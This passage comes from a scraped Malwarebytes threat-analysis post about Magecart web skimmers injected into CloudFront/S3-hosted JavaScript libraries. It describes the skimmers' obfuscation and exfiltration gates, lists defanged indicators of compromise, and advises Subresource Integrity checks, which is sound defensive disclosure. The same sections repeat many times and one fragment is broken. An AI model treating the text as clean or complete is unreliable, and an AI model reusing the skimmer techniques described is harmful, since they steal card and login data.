(font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 67 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 68 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 69 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 70 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 71 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 72 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 73 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 74 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 75 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 76 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 77 of 351\n\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 78 of 351\n\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 79 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 80 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 81 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 82 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 83 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 84 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 85 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 86 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 87 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 88 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 89 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 90 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 91 of 351\n\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 92 of 351\n\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 93 of 351\n\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 94 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 95 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 96 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 97 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 98 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 99 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see 